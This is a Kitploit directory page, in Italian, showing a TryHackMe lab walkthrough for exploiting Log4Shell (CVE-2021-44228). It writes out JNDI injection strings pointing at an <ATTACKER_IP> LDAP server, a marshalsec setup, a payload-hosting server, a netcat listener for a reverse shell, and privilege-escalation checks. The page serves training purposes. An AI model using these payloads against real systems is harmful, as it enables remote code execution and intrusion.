Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Solar-exploiting-log-4j — Passo-passo della walkthrough TryHackMe per sfruttare la vulnerabilità Log4Shell (CVE-2021-44228) per ottenere l'esecuzione remota di codice e catturare le flag. | Kitploit
Strumenti/GitHubGitHub/lathika-3006/solar-exploiting-log-4j
Escalation di PrivilegiRicognizioneAnalisi delle VulnerabilitàExploitReverse EngineeringSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneLab e Pratica

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
GitHublathika-3006/solar-exploiting-log-4j

Solar-exploiting-log-4j

Passo-passo della walkthrough TryHackMe per sfruttare la vulnerabilità Log4Shell (CVE-2021-44228) per ottenere l'esecuzione remota di codice e catturare le flag.

Vedi Repository
2115 mesi faNon ancora revisionato

🔥 Solar Exploiting Log4j - Walkthrough di TryHackMe

📌 Stanza: Solar Exploiting Log4j

Piattaforma: TryHackMe Difficoltà: Media Argomento: Log4Shell (Vulnerabilità Log4j)


🧠 Obiettivo

Sfruttare la vulnerabilità Log4j (CVE-2021-44228) per ottenere l'esecuzione remota di codice e catturare le flag.


🛠️ Strumenti Utilizzati

  • Nmap
  • Burp Suite
  • cURL
  • Netcat
  • Server HTTP Python

🌐 Passo 1: Ricognizione

🔍 Scansione del Target

root@kitploit:~
nmap -sC -sV <TARGET_IP>

📌 Risultati

  • Porte aperte: 80 (HTTP), altre a seconda della stanza
  • Applicazione web con backend basato su Java

🌐 Passo 2: Enumerazione Web

  • Visita l'app web nel browser
  • Interagisci con gli input (campi di login/ricerca/header)
  • Cattura la richiesta usando Burp Suite

💥 Passo 3: Identificare la Vulnerabilità Log4j

La vulnerabilità Log4j consente l'iniezione JNDI:

root@kitploit:~
${jndi:ldap://<ATTACKER_IP>:1389/a}

Se l'input viene registrato → la vulnerabilità è presente.


⚙️ Passo 4: Configurare il Listener

Avvia Netcat

root@kitploit:~
nc -lvnp 4444

Avvia il Server LDAP Maligno (Esempio)

root@kitploit:~
git clone https://github.com/mbechler/marshalsec
cd marshalsec
mvn clean package

Esegui il server LDAP:

root@kitploit:~
java -cp target/marshalsec.jar marshalsec.jndi.LDAPRefServer "http://<ATTACKER_IP>:8000/#Exploit" 1389

📡 Passo 5: Hosting del Payload

root@kitploit:~
python3 -m http.server 8000

Crea una classe Java maliziosa (Exploit.class)


🚀 Passo 6: Attivare l'Exploit

Inietta il payload nel campo vulnerabile:

root@kitploit:~
${jndi:ldap://<ATTACKER_IP>:1389/Exploit}

💡 Usa header come:

  • User-Agent
  • X-Api-Version

🖥️ Passo 7: Ottenere una Reverse Shell

Una volta attivato:

  • Il target si riconnette al listener Netcat
  • Ottieni l'accesso alla shell

🔐 Passo 8: Escalation dei Privilegi (se richiesto)

Controlla:

root@kitploit:~
sudo -l

Cerca:

  • Binari SUID mal configurati
  • File scrivibili
  • Cron job

🚩 Passo 9: Catturare le Flag

root@kitploit:~
find / -name flag.txt 2>/dev/null
cat flag.txt

🧾 Concetti Chiave Appresi

  • Log4Shell (CVE-2021-44228)
  • Iniezione JNDI
  • Esecuzione Remota di Codice (RCE)
  • Reverse Shell
  • Sfruttamento Web
Scarica lo strumento